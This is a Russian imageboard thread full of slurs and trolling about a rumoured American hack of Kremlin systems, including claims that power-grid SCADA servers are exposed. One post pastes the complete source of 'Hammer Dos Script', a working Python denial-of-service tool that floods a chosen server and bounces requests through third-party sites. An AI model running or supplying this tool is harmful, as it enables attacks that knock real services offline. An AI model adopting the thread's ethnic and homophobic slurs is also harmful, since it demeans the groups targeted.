Саб двач. Пендосы на рашку напали. Это можно считать как начало войны?Соурс http://byappi.ru/news/id364
>>414217 (OP)как же тааак! ВЕДЬ САССЕЙСКИ ПОГРОМИСТЫ И ХАЦКИРЫ ЛУЧШИЕ В МИРЕ!!!!!!!!ну да может некоторые лучшие и успешные сьебали в майами и калифорнию, но ведь... так скоро будет НАШ ОТВЕТ ПЕНДОСАМ И ГЕЙРОПЕ!!! ууххх проклятый обэма, трепещи геропа!!!! СКАЛЕН ВСАЁЁЁМ А НУ КАААААА!!!! ААТЬ -ДВАА
американские хакиры взломали систему кремля@и сняли блокировку с порносайтов
>>414217 (OP)Это можно считать отсутствием мозга у журнашлюх и у тех, кто это копипастит. Блядь, невозможно взломать то, что не подключено к интернету. Они бы еще кофеварку взломали у Путина, что бы она подслушивала. Пиздец, вас говном кормят, а вы только похрюкиваете.
>>414225Хочу больше говна для бога говна. Хрююююю.
>>414219нихуя тебя порвало, хохол
>>414225Ну долбоёбы журнашлюхи реально считают что ракеты и подстанции на винде работают.
>>414225хрю хрю уиииииииии! хрююю! хрю хрюк! уиииии! хрю хрю хрюк!
>>414225Хрю хрю, епта
>>414219Ну допустим - хрю.
>>414217 (OP)Ваще есть подозрения что это хохлы взламывают систему убергосударств, чтобы разгорелся срач
>>414225БОЛДЖЕНОС ЭЩЁ НИКТО НЕ ВЗЛОМАЛ! НИ ОДНОМУ ХАКЕРУ ЭТО НЕ ПОД СИЛУ, КРОМЕ ГЕНИАЛЬНОГО РАССИЙСКОГО РАЗРАБОТЧИКА!!!
>>414219>>лучшие и успешные ты типо тонко намекнул, що эти лучшие и успешные щаз хуярять на петогон валить раСССеюшку мать ???
>>414221Американские хакеры проникли в единый реестр роскомнадзора и сняли запрет с порнхаба. Группа "Анонов" двача довольна.
@В ЭФИРЕ НОВОСТИ@ГРУППА ХАЦКЕРОВ США ВЗЛОМАЛИ ЕДИНЫЙ РЕЕСТР РОСКОМНАДЗОРА@БЫЛО РАЗБРЛОКИРОВАНО ОКОЛО 100 САЙТОВ С ОТБОРНОЙ ПОРНУХОЙ@ГРУППА АНОНОВ С ДВАЧА ВЫСЫЛАЮТ СВОИ БЛАГОДАРСТВА В ВИДЕ БАНОК СО СПЕРМОЙ, КОТОРЫЕ ОНИ "НАКОНЧАЛИ"
>>414242>>414258>>414327незаметны
>>414234>>414242>>414250>>414255>>414258Ольки, у вас чего, новая методичка, хрюкать?
>>414225Группа хацкиров ОНОНИМУЗ попробуют, обязательно...
яке горе и даже глушилки не допомогли
>>414350у вас у хрюкосотни все старая?
>>414217 (OP)Три-четыре года назад какие-то малоизвестные западные парни насканили торчащий голой жопой прямо в интернет служебный сервер на Калининской АЭС. Тот самый, на котором крутится СКАДА одного из энергоблоков. На счастье пидорахенов, ребята оказались порядочные и просто ткнули руководство АЭС в этот вопиющий факт несоблюдения информационной безопасности.
>>414217 (OP)Всё что на виндовсе и так открыто и доступно. Интернет тоже могут отключить. Проблема только в том, что у нас многие вещи не автоматизированы (и даже не механизированы :) ).
>>414217 (OP)> как началоВойна джавно идёт. Не Холодная, а Прохладная.
сука почему вы себя так тупо ведете? хрюкаете блять тут, каких то олек поминаете. говно какое то, пидоры блять.
>>414249А ведь так и есть.
>>414431Жириновский, залогиньтесь пожалуйста!
>>414401Так специалист из МОЭСК подтвердила, что все СКАДА сервера видны. Устраивай блэкаут хоть сейчас.
Давайте устроим рекламу микрософту и остальным американским софтописателям - сделаем вид что реально взломали через бекдоры.
взломали со стороны пентагона
#!/usr/bin/python3# -- coding: utf-8 --# python 3.3.2+ Hammer Dos Script v.1# by Can Yalçın# only for legal purposefrom queue import Queuefrom optparse import OptionParserimport time,sys,socket,threading,logging,urllib.request,randomdef user_agent(): global uagent uagent=[] uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14") uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0") uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3") uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)") uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7") uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)") uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1") return(uagent)def my_bots(): global bots bots=[] bots.append("http://validator.w3.org/check?uri=") bots.append("http://www.facebook.com/sharer/sharer.php?u=") return(bots)def bot_hammering(url): try: while True: req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)})) print("\033[94mbot is hammering...\033[0m") time.sleep(.1) except: time.sleep(.1)def down_it(item): try: while True: packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,int(port))) if s.sendto( packet, (host, int(port)) ): s.shutdown(1) print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m") else: s.shutdown(1) print("\033[91mshut<->down\033[0m") time.sleep(.1) except socket.error as e: print("\033[91mno connection! server maybe down\033[0m") #print("\033[91m",e,"\033[0m") time.sleep(.1)def dos(): while True: item = q.get() down_it(item) q.task_done()def dos2(): while True: item=w.get() bot_hammering(random.choice(bots)+"http://"+host) w.task_done()def usage(): print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/ It is the end user's responsibility to obey all applicable laws. It is just for server testing script. Your ip is visible. \n usage : python3 hammer.py [-s] [-p] [-t] -h : help -s : server ip -p : port default 80 -t : turbo default 135 \033[0m''') sys.exit()def get_parameters(): global host global port global thr global item optp = OptionParser(add_help_option=False,epilog="Hammers") optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO) optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip") optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80") optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135") optp.add_option("-h","--help",dest="help",action='store_true',help="help you") opts, args = optp.parse_args() logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s') if opts.help: usage() if opts.host is not None: host = opts.host else: usage() if opts.port is None: port = 80 else: port = opts.port if opts.turbo is None: thr = 135 else: thr = opts.turbo# reading headersglobal dataheaders = open("headers.txt", "r")data = headers.read()headers.close()#task queue are q,wq = Queue()w = Queue()if __name__ == '__main__': if len(sys.argv) < 2: usage() get_parameters() print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m") print("\033[94mPlease wait...\033[0m") user_agent() my_bots() time.sleep(5) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,int(port))) s.settimeout(1) except socket.error as e: print("\033[91mcheck server ip and port\033[0m") usage() while True: for i in range(int(thr)): t = threading.Thread(target=dos) t.daemon = True # if thread is exist, it dies t.start() t2 = threading.Thread(target=dos2) t2.daemon = True # if thread is exist, it dies t2.start() start = time.time() #tasking item = 0 while True: if (item>1800): # for no memory crash item=0 time.sleep(.1) item = item + 1 q.put(item) w.put(item) q.join() w.join()
Пиндосам дали пососать,наняли Васю Рыбкина коды ломать!Василий за Путена восстал!!!он Пентагоны поломал.запостил голых негров там...он обамке послал банан)))
Во всем виновата Украина!1!1!!!
Ще не вмерла Украина
чет захарова уще не страшает ах да сен ж выходной